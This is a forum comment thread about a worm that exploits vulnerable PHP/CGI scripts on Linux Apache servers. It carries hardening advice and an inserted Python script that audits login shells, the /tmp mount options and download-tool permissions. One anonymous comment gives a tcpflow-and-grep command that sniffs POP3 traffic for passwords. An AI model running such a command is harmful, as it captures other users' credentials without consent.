Re:Linux/BSD only (4, Insightful)

mysqlrocks (783488) | more than 8 years ago | (#13978730)

Seriously, though; isn't everyone fairly aware that PHP ain't that secure?

No, PHP is secure. Some applications written in PHP are insecure. Programmers can introduce security vulnerabilities in any language. Bad programming is not language specific.

Well ..... (0)

Anonymous Coward | more than 8 years ago | (#13978672)

I already have tcpflow -c port 110 |grep -i pass running in a spare VC. Perhaps now I ought to have tcpflow -c port 80 running in another spare VC at all times, just in case. But I'm going to run out of VCs soon!

More info (1)

max born (739948) | more than 8 years ago | (#13978680)

According to McAfee it's: It is a modified derivative of the Linux/Slapper ...

And according to a 2002 cert advisory [cert.org] the slapper worm appears to work only on Linux systems running Apache with the OpenSSL module (mod_ssl) on Intel architect..

Surprisingly, there seems to be no mention of it at apache.org, which leads me to think it's pretty benign and not widespread. I could be wrong.

no login shell (1)

Understudy (111386) | more than 8 years ago | (#13978707)

If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed.

1. Don't permit external shell access through your www accounts. Make all your www accounts' shell /usr/bin/false. I realize that some people need CLI access, but it should be severely limited in its functions and only used by those who have a real need.
2. Don't permit PHP/CGI scripts that are exploitable. Okay, that is a broad general statement; however, there are well-known malicious scripts and well-known exploitable scripts. Don't allow them. And certainly don't allow them if CLI access is being used.
3. do apply your security patches (after testing).
4. Host with a good website company like 34sp.com [34sp.com] (shameless plug with who I am hosted on)

clearly a violation (4, Funny)

FudRucker (866063) | more than 8 years ago | (#13978712)

if this worm does not include the sourcecode with every computer it infects it is violating the terms and conditions of the GNU/GPL

Simple but effective hardening measures (1)

dskoll (99328) | more than 8 years ago | (#13978732)

Here are some simple things you can do to harden your server. Note that they are not a substitute for actually fixing or removing broken scripts, but they can buy you time.

  • Enable SELinux. However, if you're running these kinds of scripts, you probably aren't protected by SELinux.
  • Mount /tmp with the noexec flag. Again, not complete protection if the malware is a script (because it can be invoked explicitly with the command interpreter), but it would stop this particular one.
  • Change the permissions on wget so that apache can't read or execute it. Or, remove wget completely from your server. Similarly for rsync, ncftp, etc.

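As an added example (mine, not from Understudy or dskoll), Python checks for the measures the two posts above describe: the web-server account's login shell, noexec on /tmp, and whether the web-server account can run wget and similar downloaders. It runs here over constructed /etc/passwd, /proc/mounts and stat-style inputs rather than the live system; the account names, shells and tool list are assumptions.

```python
import stat

NOLOGIN_SHELLS = {"/usr/bin/false", "/bin/false", "/sbin/nologin", "/usr/sbin/nologin"}
WEB_ACCOUNTS = {"apache", "www-data", "httpd", "nobody"}       # assumed account names
DOWNLOADERS = ("wget", "curl", "ncftp", "rsync", "ftp", "lynx")  # tools dskoll mentions, plus a few

# Constructed weak/hardened inputs: /etc/passwd text, /proc/mounts text and a
# {path: (mode, owner, group)} table standing in for os.stat() on the binaries.
WEAK_PASSWD = "root:x:0:0:root:/root:/bin/bash\napache:x:48:48:Apache:/var/www:/bin/bash\n"
HARD_PASSWD = "root:x:0:0:root:/root:/bin/bash\napache:x:48:48:Apache:/var/www:/usr/bin/false\n"
WEAK_MOUNTS = "/dev/sda1 / ext3 rw 0 0\n"
HARD_MOUNTS = "/dev/sda1 / ext3 rw 0 0\ntmpfs /tmp tmpfs rw,nosuid,nodev,noexec 0 0\n"
WEAK_TOOLS = {"/usr/bin/wget": (0o755, "root", "root"), "/usr/bin/rsync": (0o755, "root", "root")}
HARD_TOOLS = {"/usr/bin/wget": (0o750, "root", "root"), "/usr/bin/rsync": (0o750, "root", "root")}

def shell_findings(passwd_text):
    """Web-server accounts that still have a real login shell (Understudy's point 1)."""
    bad = []
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) == 7 and f[0] in WEB_ACCOUNTS and f[6] not in NOLOGIN_SHELLS:
            bad.append((f[0], f[6]))
    return bad

def tmp_mount_findings(mounts_text):
    """Options /tmp should carry but lacks (dskoll's point 2). As dskoll notes, noexec
    alone does not stop a script that is run through its interpreter."""
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) >= 4 and fields[1] == "/tmp":
            return sorted({"noexec", "nosuid"} - set(fields[3].split(",")))
    return ["no dedicated /tmp mount"]

def downloader_findings(tools, web_groups=frozenset(WEB_ACCOUNTS)):
    """Download tools a web-server account (never the owner) could execute (dskoll's point 3)."""
    runnable = []
    for path, (mode, _owner, group) in tools.items():
        if path.rsplit("/", 1)[-1] not in DOWNLOADERS:
            continue
        group_exec = group in web_groups and mode & stat.S_IXGRP
        if mode & stat.S_IXOTH or group_exec:
            runnable.append(path)
    return sorted(runnable)
```

On a real host, feed it `open("/etc/passwd").read()`, `open("/proc/mounts").read()` and a dict built from `os.stat()` and `grp`/`pwd` lookups.
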
Why Linux is still more secure (1)

ZachPruckowski (918562) | more than 8 years ago | (#13978740)

Unless I misunderstand the article and comments, it seems that

Safety of Linux user who screws up >> MS user who does everything right

Yah! A Worm! (1)

barefootgenius (926803) | more than 8 years ago | (#13978742)

Now I have something to do with this O.S. that I don't seem able to kill with normal usage.
Which packages do I have to install? I'm feeling nostalgic for Windows.

linux? sounds like apache+php (1)

Cheeze (12756) | more than 8 years ago | (#13978749)

sounds to me like an apache with php problem.

I don't see how that would make it a linux worm. Does this "worm" also work on Solaris, HPUX, AIX, and other apache and php aware operating systems?

sounds to me like a new version of the old formmail.pl problem.